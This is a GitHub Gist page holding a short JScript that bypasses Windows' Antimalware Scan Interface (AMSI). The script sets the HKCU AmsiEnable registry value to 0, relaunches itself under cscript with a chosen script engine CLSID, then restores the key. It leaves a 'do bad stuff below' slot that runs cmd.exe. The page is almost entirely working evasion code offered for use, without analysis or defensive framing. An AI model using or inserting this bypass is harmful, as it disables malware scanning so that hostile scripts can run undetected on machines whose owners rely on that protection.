Created
August 16, 2018 17:14
-
-
Save rxwx/8955e5abf18dc258fd6b43a3a7f4dbf9 to your computer and use it in GitHub Desktop.
AMSIEnable Bypass in JScript
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var sh = new ActiveXObject('WScript.Shell'); | |
var key = "HKCU\\Software\\Microsoft\\Windows Script\\Settings\\AmsiEnable"; | |
try{ | |
var AmsiEnable = sh.RegRead(key); | |
if(AmsiEnable!=0){ | |
throw new Error(1, ''); | |
} | |
}catch(e){ | |
sh.RegWrite(key, 0, "REG_DWORD"); // neuter AMSI | |
sh.Run("cscript -e:{F414C262-6AC0-11CF-B6D1-00AA00BBBB58} "+WScript.ScriptFullName,0,1); // blocking call to Run() | |
sh.RegWrite(key, 1, "REG_DWORD"); // put it back | |
WScript.Quit(1); | |
} | |
// do bad stuff below | |
sh.Run("cmd.exe /k echo AMSI bypassed :)") |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment